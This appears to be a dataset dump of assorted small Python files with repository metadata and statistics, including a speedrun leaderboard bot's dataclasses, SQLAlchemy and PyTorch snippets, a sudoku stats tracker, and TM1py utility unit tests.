1,114
py
Python
data_models.py
Seckswrecks/celeste-lb-bot
700c1c8fb911ab835f6458b9f93c96472bc9d449
[ "MIT" ]
null
null
null
data_models.py
Seckswrecks/celeste-lb-bot
700c1c8fb911ab835f6458b9f93c96472bc9d449
[ "MIT" ]
null
null
null
data_models.py
Seckswrecks/celeste-lb-bot
700c1c8fb911ab835f6458b9f93c96472bc9d449
[ "MIT" ]
null
null
null
""" data_models.py Dataclasses related to configuration """ from dataclasses import dataclass from typing import List ################# ## CREDENTIALS ## ################# @dataclass(frozen=True) class SpeedrunCredentials: """speedrun.com API credentials""" csrf: str session: str @dataclass(frozen=True) class TwitchCredentials: """Twitch API credentials""" client: str secret: str @dataclass(frozen=True) class Credentials: """Representation of API credentials used by bot""" src: SpeedrunCredentials twitch: TwitchCredentials ############### ## GAME INFO ## ############### @dataclass(frozen=True) class CelesteGameVersion: """Representation of data related to 'Version' variable for Celeste games""" variable_id: str default_ver: str invalid_ver: dict @dataclass(frozen=True) class Game: """speedrun.com game representation""" id: str name: str version: CelesteGameVersion @dataclass(frozen=True) class CelesteGames: """Repesentation of data for collection of all Celeste games""" games: List[Game]
16.382353
80
0.658887
115
1,114
6.347826
0.443478
0.123288
0.156164
0.19726
0.073973
0
0
0
0
0
0
0
0.193896
1,114
67
81
16.626866
0.812918
0.301616
0
0.222222
0
0
0
0
0
0
0
0
0
1
0
true
0
0.074074
0
0.777778
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
1
0
0
3
483cbd674df83c1e44696214fb3e207dbecfc338
120
py
Python
utils/hello.py
NicoleDwe/cds-language
4b7904b102408b3cda3ba59748fe8360b1bd57d3
[ "MIT" ]
10
2021-02-02T13:42:29.000Z
2022-02-07T10:51:52.000Z
utils/hello.py
NicoleDwe/cds-language
4b7904b102408b3cda3ba59748fe8360b1bd57d3
[ "MIT" ]
null
null
null
utils/hello.py
NicoleDwe/cds-language
4b7904b102408b3cda3ba59748fe8360b1bd57d3
[ "MIT" ]
16
2021-02-01T14:39:34.000Z
2022-02-21T13:09:34.000Z
def main(name="User", name2="Your Pal"): print(f"Hello, {name}! I am {name2}!") if __name__=="__main__": main()
24
42
0.6
18
120
3.555556
0.722222
0
0
0
0
0
0
0
0
0
0
0.02
0.166667
120
5
43
24
0.62
0
0
0
0
0
0.396694
0
0
0
0
0
0
1
0.25
false
0
0
0
0.25
0.25
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
483e18015ffffe7f1e0a4ae8ae099d5ca8f9ad6b
364
py
Python
app/team/models.py
spravesh1818/globalFantasyLeague
296eba4e450a60ef9df1664de9a59e95b9351758
[ "BSD-3-Clause" ]
null
null
null
app/team/models.py
spravesh1818/globalFantasyLeague
296eba4e450a60ef9df1664de9a59e95b9351758
[ "BSD-3-Clause" ]
null
null
null
app/team/models.py
spravesh1818/globalFantasyLeague
296eba4e450a60ef9df1664de9a59e95b9351758
[ "BSD-3-Clause" ]
null
null
null
import sqlalchemy from db import metadata team = sqlalchemy.Table( "team", metadata, sqlalchemy.Column("id", sqlalchemy.Integer, primary_key=True), sqlalchemy.Column("name", sqlalchemy.String, unique=True), sqlalchemy.Column("stadium", sqlalchemy.String, unique=True), sqlalchemy.Column("league_id", sqlalchemy.ForeignKey("league.id")), )
30.333333
71
0.728022
41
364
6.414634
0.463415
0.243346
0.228137
0.197719
0.319392
0.319392
0
0
0
0
0
0
0.131868
364
11
72
33.090909
0.832278
0
0
0
0
0
0.096154
0
0
0
0
0
0
1
0
false
0
0.2
0
0.2
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
483f8313c556371351a76d4ed62b848b289ebdee
169
py
Python
text/_cascade/text/_text.py
jedhsu/text
8525b602d304ac571a629104c48703443244545c
[ "Apache-2.0" ]
null
null
null
text/_cascade/text/_text.py
jedhsu/text
8525b602d304ac571a629104c48703443244545c
[ "Apache-2.0" ]
null
null
null
text/_cascade/text/_text.py
jedhsu/text
8525b602d304ac571a629104c48703443244545c
[ "Apache-2.0" ]
null
null
null
""" *Text* Text is a string type. # [TODO] rigorous container def """ from abc import ABCMeta __all__ = ["Text"] class Text: __metaclass__ = ABCMeta
9.388889
33
0.621302
20
169
4.85
0.8
0
0
0
0
0
0
0
0
0
0
0
0.266272
169
17
34
9.941176
0.782258
0.372781
0
0
0
0
0.045455
0
0
0
0
0.058824
0
1
0
false
0
0.25
0
0.75
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
1
0
0
3
4840c196e6dd1fd800f09a49a4deccc79c925cb7
263
py
Python
pytorch_toolbelt/modules/identity.py
ternaus/pytorch-toolbelt
a952882bae1ded4f9a583cbdf87ba6f335ef3abf
[ "MIT" ]
3
2019-10-02T04:05:57.000Z
2020-01-13T02:26:09.000Z
pytorch_toolbelt/modules/identity.py
ternaus/pytorch-toolbelt
a952882bae1ded4f9a583cbdf87ba6f335ef3abf
[ "MIT" ]
null
null
null
pytorch_toolbelt/modules/identity.py
ternaus/pytorch-toolbelt
a952882bae1ded4f9a583cbdf87ba6f335ef3abf
[ "MIT" ]
1
2019-12-02T05:40:03.000Z
2019-12-02T05:40:03.000Z
from torch import nn __all__ = ['Identity'] class Identity(nn.Module): """The most useful module. A pass-through module which does nothing.""" def __init__(self, *args, **kwargs): super().__init__() def forward(self, x): return x
18.785714
75
0.631179
34
263
4.529412
0.764706
0
0
0
0
0
0
0
0
0
0
0
0.235741
263
13
76
20.230769
0.766169
0.247148
0
0
0
0
0.041667
0
0
0
0
0
0
1
0.285714
false
0
0.142857
0.142857
0.714286
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
484d38df92bedac2721834518374e08da4a9606d
376
py
Python
django_event/backends/rabbitmq/settings.py
ailove-dev/django-event
2d82cee0b3b86209850cbb6e382d597d2624251d
[ "MIT" ]
3
2015-08-31T00:46:12.000Z
2017-12-13T01:32:32.000Z
django_event/backends/rabbitmq/settings.py
ailove-dev/django-event
2d82cee0b3b86209850cbb6e382d597d2624251d
[ "MIT" ]
8
2015-01-20T12:27:24.000Z
2015-05-29T12:29:53.000Z
django_event/backends/rabbitmq/settings.py
ailove-dev/django-event
2d82cee0b3b86209850cbb6e382d597d2624251d
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ RabbitMQ backend specific settings module. """ from __future__ import unicode_literals from django_event.backends.base.settings import * HOST = HOST or 5672 VIRTUAL_HOST = settings.BACKEND_OPTIONS.get('VIRTUAL_HOST', '') USERNAME = settings.BACKEND_OPTIONS.get('USERNAME', '') QUEUE_NAME = settings.BACKEND_OPTIONS.get('QUEUE_NAME', 'default')
25.066667
66
0.755319
47
376
5.765957
0.574468
0.166052
0.243542
0.276753
0
0
0
0
0
0
0
0.014925
0.109043
376
15
66
25.066667
0.79403
0.172872
0
0
0
0
0.121711
0
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
4872a60edf0eaad6dfff24e457a38ff3b99aef20
2,835
py
Python
tests/test_packaging.py
armaandhull/great_expectations
257d0a06cdae09a6b20aa1f6554649de10409fa7
[ "Apache-2.0" ]
null
null
null
tests/test_packaging.py
armaandhull/great_expectations
257d0a06cdae09a6b20aa1f6554649de10409fa7
[ "Apache-2.0" ]
null
null
null
tests/test_packaging.py
armaandhull/great_expectations
257d0a06cdae09a6b20aa1f6554649de10409fa7
[ "Apache-2.0" ]
null
null
null
import requirements as rp from great_expectations.data_context.util import file_relative_path def test_requirements_files(): """requirements.txt should be a subset of requirements-dev.txt""" with open(file_relative_path(__file__, "../requirements.txt")) as req: requirements = set( [f'{line.name}{"".join(line.specs[0])}' for line in rp.parse(req)] ) with open(file_relative_path(__file__, "../requirements-dev.txt")) as req: requirements_dev = set( [f'{line.name}{"".join(line.specs[0])}' for line in rp.parse(req)] ) with open(file_relative_path(__file__, "../requirements-dev-util.txt")) as req: requirements_dev_util = set( [f'{line.name}{"".join(line.specs[0])}' for line in rp.parse(req)] ) with open(file_relative_path(__file__, "../requirements-dev-spark.txt")) as req: requirements_dev_spark = set( [f'{line.name}{"".join(line.specs[0])}' for line in rp.parse(req)] ) with open( file_relative_path(__file__, "../requirements-dev-sqlalchemy.txt") ) as req: requirements_dev_sqlalchemy = set( [f'{line.name}{"".join(line.specs[0])}' for line in rp.parse(req)] ) with open(file_relative_path(__file__, "../requirements-dev-test.txt")) as req: requirements_dev_test = set( [f'{line.name}{"".join(line.specs[0])}' for line in rp.parse(req)] ) with open(file_relative_path(__file__, "../requirements-dev-build.txt")) as req: requirements_dev_build = set( [f'{line.name}{"".join(line.specs[0])}' for line in rp.parse(req)] ) assert requirements <= requirements_dev assert requirements_dev_util.intersection(requirements_dev_spark) == set() assert requirements_dev_util.intersection(requirements_dev_sqlalchemy) == set() assert requirements_dev_util.intersection(requirements_dev_test) == set() assert requirements_dev_util.intersection(requirements_dev_build) == set() assert requirements_dev_spark.intersection(requirements_dev_sqlalchemy) == set() assert requirements_dev_spark.intersection(requirements_dev_test) == set() assert requirements_dev_spark.intersection(requirements_dev_build) == 
set() assert requirements_dev_sqlalchemy.intersection(requirements_dev_test) == set() assert requirements_dev_sqlalchemy.intersection(requirements_dev_build) == set() assert requirements_dev_test.intersection(requirements_dev_build) == set() assert ( requirements_dev - ( requirements | requirements_dev_util | requirements_dev_sqlalchemy | requirements_dev_spark | requirements_dev_test | requirements_dev_build ) == set() )
38.310811
84
0.665256
339
2,835
5.235988
0.120944
0.338028
0.130141
0.135211
0.780282
0.702535
0.702535
0.650704
0.322817
0.322817
0
0.003122
0.209171
2,835
73
85
38.835616
0.788582
0.020811
0
0.125
0
0
0.15704
0.150181
0
0
0
0
0.214286
1
0.017857
false
0
0.035714
0
0.053571
0
0
0
0
null
1
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
4873fcb4893b51a57f9bd4b8ad91dc008e82bf64
139
py
Python
main_menu.py
Johnson070/Graphics.py-to-Python-code
f7d102ba89a95a7b7123d49ab27ef2ca58185cf6
[ "Apache-2.0" ]
null
null
null
main_menu.py
Johnson070/Graphics.py-to-Python-code
f7d102ba89a95a7b7123d49ab27ef2ca58185cf6
[ "Apache-2.0" ]
null
null
null
main_menu.py
Johnson070/Graphics.py-to-Python-code
f7d102ba89a95a7b7123d49ab27ef2ca58185cf6
[ "Apache-2.0" ]
null
null
null
from graphics import * def create_menu(win): ln = Line(Point(1000, 0), Point(1000, 999)) ln.setOutline("black") ln.draw(win)
17.375
47
0.640288
21
139
4.190476
0.761905
0.204545
0
0
0
0
0
0
0
0
0
0.108108
0.201439
139
7
48
19.857143
0.684685
0
0
0
0
0
0.035971
0
0
0
0
0
0
1
0.2
false
0
0.2
0
0.4
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
487df582b3b18e98ff48cf04e2f8238700fd6568
985
py
Python
sudoku/stats.py
bdunton9323/sudoku
4974ac6c4676d63ac5dfda6714214e119bf7417b
[ "MIT" ]
null
null
null
sudoku/stats.py
bdunton9323/sudoku
4974ac6c4676d63ac5dfda6714214e119bf7417b
[ "MIT" ]
null
null
null
sudoku/stats.py
bdunton9323/sudoku
4974ac6c4676d63ac5dfda6714214e119bf7417b
[ "MIT" ]
null
null
null
import time class StatsTracker(object): def __init__(self): self.num_iterations = None self.num_guesses = 0 self.max_recursion_depth = 0 self.start_time = 0 self.end_time = 0 @property def num_iterations(self): return self._num_iterations @num_iterations.setter def num_iterations(self, val): self._num_iterations = val @property def num_guesses(self): return self._num_iterations @num_guesses.setter def num_guesses(self, val): self._num_iterations = val def on_recursion(self, depth): if depth > self.max_recursion_depth: self.max_recursion_depth = depth def get_max_recursion_depth(self): return self.max_recursion_depth def start_timer(self): self.start_time = time.time() def stop_timer(self): self.end_time = time.time() def get_elapsed_time(self): return self.end_time - self.start_time
22.906977
46
0.651777
128
985
4.6875
0.21875
0.173333
0.141667
0.14
0.268333
0.19
0
0
0
0
0
0.005563
0.270051
985
42
47
23.452381
0.828929
0
0
0.193548
0
0
0
0
0
0
0
0
0
1
0.322581
false
0
0.032258
0.129032
0.516129
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
4882940136c94d854b77d0f3dab3ca330990e2ff
534
py
Python
problem_40/champernowne.py
plilja/project-euler
646d1989cf15e903ef7e3c6e487284847d522ec9
[ "Apache-2.0" ]
null
null
null
problem_40/champernowne.py
plilja/project-euler
646d1989cf15e903ef7e3c6e487284847d522ec9
[ "Apache-2.0" ]
null
null
null
problem_40/champernowne.py
plilja/project-euler
646d1989cf15e903ef7e3c6e487284847d522ec9
[ "Apache-2.0" ]
null
null
null
_champernownes_constant = "" def _calculate_champernownes_nth_decimal(length): res = [] curr_length = 0 i = 1 while curr_length < length: res += [str(i)] curr_length += len(res[-1]) i += 1 return "".join(res) def champernownes_nth_decimal(n): global _champernownes_constant if len(_champernownes_constant) >= n: return int(_champernownes_constant[n - 1]) _champernownes_constant = _calculate_champernownes_nth_decimal(2 * n) return champernownes_nth_decimal(n)
24.272727
73
0.67603
63
534
5.333333
0.349206
0.3125
0.27381
0.190476
0
0
0
0
0
0
0
0.014528
0.226592
534
21
74
25.428571
0.799031
0
0
0
0
0
0
0
0
0
0
0
0
1
0.125
false
0
0
0
0.3125
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
6f81cba42a9a1a63b9f47653e4afb2dd4df2f06e
203
py
Python
src/model/game/two2seven/two2seven.py
Jagermeister/expeditions
b5cfece24aa84da8342e0e1b457b8dab775d7a15
[ "MIT" ]
null
null
null
src/model/game/two2seven/two2seven.py
Jagermeister/expeditions
b5cfece24aa84da8342e0e1b457b8dab775d7a15
[ "MIT" ]
null
null
null
src/model/game/two2seven/two2seven.py
Jagermeister/expeditions
b5cfece24aa84da8342e0e1b457b8dab775d7a15
[ "MIT" ]
null
null
null
import random from copy import deepcopy from ..game import Game class GuessGame(Game): name = 'Deuce to Seven - Triple Draw' player_count = 6 def __init__(self): super().__init__()
18.454545
41
0.674877
27
203
4.740741
0.777778
0
0
0
0
0
0
0
0
0
0
0.006452
0.236453
203
11
42
18.454545
0.819355
0
0
0
0
0
0.137255
0
0
0
0
0
0
1
0.125
false
0
0.375
0
0.875
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
3
6f886d2db3fd0eb0045daa761a734fbd35aeb082
11,635
py
Python
Tests/Utils.py
andreyea/tm1py
ab89fe0fab042dbf37deffc43c46c8e1c65a62ff
[ "MIT" ]
null
null
null
Tests/Utils.py
andreyea/tm1py
ab89fe0fab042dbf37deffc43c46c8e1c65a62ff
[ "MIT" ]
null
null
null
Tests/Utils.py
andreyea/tm1py
ab89fe0fab042dbf37deffc43c46c8e1c65a62ff
[ "MIT" ]
null
null
null
import configparser import unittest from pathlib import Path from TM1py.Services import TM1Service from TM1py.Utils import ( Utils, get_dimensions_from_where_clause, integerize_version, verify_version, get_cube, resembles_mdx, format_url, add_url_parameters, extract_cell_updateable_property, CellUpdateableProperty, cell_is_updateable, ) class TestUtilsMethods(unittest.TestCase): @classmethod def setUpClass(cls): """ Establishes a connection to TM1 and creates TM1 objects to use across all tests """ # Connection to TM1 cls.config = configparser.ConfigParser() cls.config.read(Path(__file__).parent.joinpath("config.ini")) cls.tm1 = TM1Service(**cls.config["tm1srv01"]) def test_get_instances_from_adminhost(self): servers = Utils.get_all_servers_from_adminhost( self.config["tm1srv01"]["address"] ) self.assertGreater(len(servers), 0) def test_integerize_version(self): version = "11.0.00000.918" integerized_version = integerize_version(version) self.assertEqual(110, integerized_version) version = "11.0.00100.927-0" integerized_version = integerize_version(version) self.assertEqual(110, integerized_version) version = "11.1.00004.2" integerized_version = integerize_version(version) self.assertEqual(111, integerized_version) version = "11.2.00000.27" integerized_version = integerize_version(version) self.assertEqual(112, integerized_version) version = "11.3.00003.1" integerized_version = integerize_version(version) self.assertEqual(113, integerized_version) version = "11.4.00003.8" integerized_version = integerize_version(version) self.assertEqual(114, integerized_version) version = "11.7.00002.1" integerized_version = integerize_version(version) self.assertEqual(117, integerized_version) version = "11.8.00000.33" integerized_version = integerize_version(version) self.assertEqual(118, integerized_version) def test_verify_version_true(self): required_version = "11.7.00002.1" version = "11.8.00000.33" result = verify_version(required_version=required_version, version=version) 
self.assertEqual(True, result) def test_verify_version_false(self): required_version = "11.7.00002.1" version = "11.2.00000.27" result = verify_version(required_version=required_version, version=version) self.assertEqual(False, result) def test_verify_version_equal(self): required_version = "11.7.00002.1" version = "11.7.00002.1" result = verify_version(required_version=required_version, version=version) self.assertEqual(True, result) def test_get_dimensions_from_where_clause_happy_case(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] WHERE ([dim2].[e1], [dim1].[e4]) """ dimensions = get_dimensions_from_where_clause(mdx) self.assertEqual(["DIM2", "DIM1"], dimensions) def test_get_dimensions_from_where_clause_no_where(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] """ dimensions = get_dimensions_from_where_clause(mdx) self.assertEqual([], dimensions) def test_get_dimensions_from_where_clause_casing(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] WhEre ([dim1].[e4]) """ dimensions = get_dimensions_from_where_clause(mdx) self.assertEqual(["DIM1"], dimensions) def test_get_dimensions_from_where_clause_spacing(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] WHERE([dim5]. [e4] ) """ dimensions = get_dimensions_from_where_clause(mdx) self.assertEqual(["DIM5"], dimensions) def test_get_cube(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] WHERE([dim5]. [e4] ) """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_get_cube_without_brackets(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM cube WHERE([dim5]. [e4] ) """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_get_cube_without_brackets_multi_from_where(self): mdx = """ SELECT {[dim3from].[e2where]} ON COLUMNS, {[dim4from].[wheree5]} ON ROWS FROM cube WHERE([dim5]. 
[e4] ) """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_get_cube_without_rows(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS FROM [cube] WHERE([dim5]. [e4] ) """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_get_cube_without_where(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_get_cube_with_tabs_and_linebreaks(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube ] """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_get_cube_without_brackets_without_where(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_get_cube_from_and_where_in_dimension_names(self): mdx = """ SELECT {[dim3from].[e2]} ON COLUMNS, {[dim4where].[e5]} ON ROWS FROM [cube] """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_resemble_mdx_happy_case_true(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] """ self.assertTrue(resembles_mdx(mdx)) def test_resemble_mdx_happy_case_false(self): mdx = """ not mdx """ self.assertFalse(resembles_mdx(mdx)) def test_resemble_mdx_lower_case(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] """.lower() self.assertTrue(resembles_mdx(mdx)) def test_resemble_mdx_with_line_breaks(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] """ self.assertTrue(resembles_mdx(mdx)) def test_resemble_mdx_no_rows(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS FROM [cube] """ self.assertTrue(resembles_mdx(mdx)) def test_resemble_mdx_with_member(self): mdx = """ WITH MEMBER [dim3].[e3] AS 1 SELECT {[dim3].[e2], [dim3].[e3]} ON COLUMNS FROM [cube] """ self.assertTrue(resembles_mdx(mdx)) def test_format_url_args_no_single_quote(self): url = 
"/api/v1/Processes('{}')/tm1.ExecuteWithReturn?$expand=*" process_name = "process" escaped_url = format_url(url, process_name) self.assertEqual( "/api/v1/Processes('process')/tm1.ExecuteWithReturn?$expand=*", escaped_url ) def test_format_url_args_one_single_quote(self): url = "/api/v1/Processes('{}')/tm1.ExecuteWithReturn?$expand=*" process_name = "pro'cess" escaped_url = format_url(url, process_name) self.assertEqual( "/api/v1/Processes('pro''cess')/tm1.ExecuteWithReturn?$expand=*", escaped_url, ) def test_format_url_args_multi_single_quote(self): url = "/api/v1/Processes('{}')/tm1.ExecuteWithReturn?$expand=*" process_name = "pro'ces's" escaped_url = format_url(url, process_name) self.assertEqual( "/api/v1/Processes('pro''ces''s')/tm1.ExecuteWithReturn?$expand=*", escaped_url, ) def test_format_url_kwargs_no_single_quote(self): url = "/api/v1/Processes('{process_name}')/tm1.ExecuteWithReturn?$expand=*" process_name = "process" escaped_url = format_url(url, process_name=process_name) self.assertEqual( "/api/v1/Processes('process')/tm1.ExecuteWithReturn?$expand=*", escaped_url ) def test_format_url_kwargs_one_single_quote(self): url = "/api/v1/Processes('{process_name}')/tm1.ExecuteWithReturn?$expand=*" process_name = "pro'cess" escaped_url = format_url(url, process_name=process_name) self.assertEqual( "/api/v1/Processes('pro''cess')/tm1.ExecuteWithReturn?$expand=*", escaped_url, ) def test_format_url_kwargs_multi_single_quote(self): url = "/api/v1/Processes('{process_name}')/tm1.ExecuteWithReturn?$expand=*" process_name = "pro'ces's" escaped_url = format_url(url, process_name=process_name) self.assertEqual( "/api/v1/Processes('pro''ces''s')/tm1.ExecuteWithReturn?$expand=*", escaped_url, ) def test_url_parameters_add(self): url = "/api/v1/Cubes('cube')/tm1.Update" url = add_url_parameters(url, **{"!sandbox": "sandbox1"}) self.assertEqual( "/api/v1/Cubes('cube')/tm1.Update?!sandbox=sandbox1", url) def test_url_parameters_add_with_query_options(self): url = 
"/api/v1/Cellsets('abcd')?$expand=Cells($select=Value)" url = add_url_parameters(url, **{"!sandbox": "sandbox1"}) self.assertEqual( "/api/v1/Cellsets('abcd')?$expand=Cells($select=Value)&!sandbox=sandbox1", url) def test_get_seconds_from_duration(self): elapsed_time = "P0DT00H04M02S" seconds = Utils.get_seconds_from_duration(elapsed_time) self.assertEqual(242, seconds) def test_extract_cell_updateable_property_rule_is_applied_true(self): value = 268435716 self.assertTrue(extract_cell_updateable_property( decimal_value=value, cell_property=CellUpdateableProperty.RULE_IS_APPLIED)) def test_extract_cell_updateable_property_rule_is_applied_false(self): value = 258 self.assertFalse(extract_cell_updateable_property( decimal_value=value, cell_property=CellUpdateableProperty.RULE_IS_APPLIED)) def test_extract_cell_updateable_property_cell_is_not_updateable_true(self): value = 268435716 self.assertTrue(extract_cell_updateable_property( decimal_value=value, cell_property=CellUpdateableProperty.CELL_IS_NOT_UPDATEABLE)) def test_extract_cell_updateable_property_cell_is_not_updateable_false(self): value = 258 self.assertFalse(extract_cell_updateable_property( decimal_value=value, cell_property=CellUpdateableProperty.CELL_IS_NOT_UPDATEABLE)) def test_cell_is_updateable_true(self): cell = {'Updateable': 258} self.assertTrue(cell_is_updateable(cell)) def test_cell_is_updateable_false(self): cell = {'Updateable': 268435716} self.assertFalse(cell_is_updateable(cell)) @classmethod def tearDownClass(cls): cls.tm1.logout() if __name__ == "__main__": unittest.main()
34.93994
111
0.635153
1,353
11,635
5.171471
0.132299
0.038016
0.029727
0.034015
0.777619
0.744605
0.728598
0.687295
0.650993
0.604259
0
0.038723
0.240911
11,635
332
112
35.045181
0.75351
0.008423
0
0.570896
0
0.022388
0.263962
0.085816
0
0
0
0
0.16791
1
0.149254
false
0
0.018657
0
0.171642
0
0
0
0
null
0
0
0
0
1
1
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
6f8ea68767f0ee4a491755309f0e8368b8998797
386
py
Python
aerostructures/number_formatting/is_number.py
NitroCortex/aerostructures
bdf7b079008b3b5a47288d91093da7940784e94c
[ "Apache-2.0" ]
null
null
null
aerostructures/number_formatting/is_number.py
NitroCortex/aerostructures
bdf7b079008b3b5a47288d91093da7940784e94c
[ "Apache-2.0" ]
null
null
null
aerostructures/number_formatting/is_number.py
NitroCortex/aerostructures
bdf7b079008b3b5a47288d91093da7940784e94c
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- """ """ #Function that checks whether a string can be converted into a float def isfloat(value): try: float(value) return True except ValueError: return False #Function that checks whether a string can be converted into an integer def isint(value): try: int(value) return True except ValueError: return False
19.3
72
0.650259
51
386
4.921569
0.529412
0.095618
0.143426
0.199203
0.733068
0.733068
0.733068
0.398406
0.398406
0.398406
0
0.003546
0.26943
386
19
73
20.315789
0.886525
0.409326
0
0.666667
0
0
0
0
0
0
0
0
0
1
0.166667
false
0
0
0
0.5
0
0
0
0
null
0
0
1
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
6f9080744fac244020f18fc9abea00ea0fc34a18
193
py
Python
.config/autokey/data/keyboard_automation/home.py
danyloM/dotfiles
0df6ff1465ba4263887f0e0c9e513aa7229e55bd
[ "MIT" ]
null
null
null
.config/autokey/data/keyboard_automation/home.py
danyloM/dotfiles
0df6ff1465ba4263887f0e0c9e513aa7229e55bd
[ "MIT" ]
null
null
null
.config/autokey/data/keyboard_automation/home.py
danyloM/dotfiles
0df6ff1465ba4263887f0e0c9e513aa7229e55bd
[ "MIT" ]
null
null
null
winClass = window.get_active_class() if winClass not in ("code.Code", "emacs.Emacs"): # Regular window keyboard.send_keys('<home>') else: # VS Code keyboard.send_keys('<alt>+a')
27.571429
48
0.663212
27
193
4.592593
0.703704
0.193548
0.258065
0
0
0
0
0
0
0
0
0
0.170984
193
7
49
27.571429
0.775
0.11399
0
0
0
0
0.195266
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
6f965f719097d5f0feb42b1808376a627656aaf8
59
py
Python
smartcontract/venv/lib/python3.6/site-packages/bpython/_version.py
simplitech/neoinvoice
bc9a0217858938b49f99fef13b3439f4a537a5f5
[ "MIT" ]
null
null
null
smartcontract/venv/lib/python3.6/site-packages/bpython/_version.py
simplitech/neoinvoice
bc9a0217858938b49f99fef13b3439f4a537a5f5
[ "MIT" ]
null
null
null
smartcontract/venv/lib/python3.6/site-packages/bpython/_version.py
simplitech/neoinvoice
bc9a0217858938b49f99fef13b3439f4a537a5f5
[ "MIT" ]
null
null
null
# Auto-generated file, do not edit! __version__ = '0.17.1'
19.666667
35
0.694915
10
59
3.7
1
0
0
0
0
0
0
0
0
0
0
0.08
0.152542
59
2
36
29.5
0.66
0.559322
0
0
1
0
0.25
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
6f9aff725adbd1651d2c62a92c8abe47e51247ef
24
py
Python
TVpy/__init__.py
Jitrixis/2ARC-Network-stack
f0f7f68b989c5c6eaca3be46554dd5c7010e1551
[ "MIT" ]
1
2017-08-22T20:44:12.000Z
2017-08-22T20:44:12.000Z
TVpy/__init__.py
Jitrixis/2ARC-Network-stack
f0f7f68b989c5c6eaca3be46554dd5c7010e1551
[ "MIT" ]
1
2015-11-17T15:53:46.000Z
2015-11-19T21:14:35.000Z
TVpy/__init__.py
Jitrixis/2ARC-Network-stack
f0f7f68b989c5c6eaca3be46554dd5c7010e1551
[ "MIT" ]
null
null
null
__author__ = 'jitrixis'
12
23
0.75
2
24
7
1
0
0
0
0
0
0
0
0
0
0
0
0.125
24
1
24
24
0.666667
0
0
0
0
0
0.333333
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
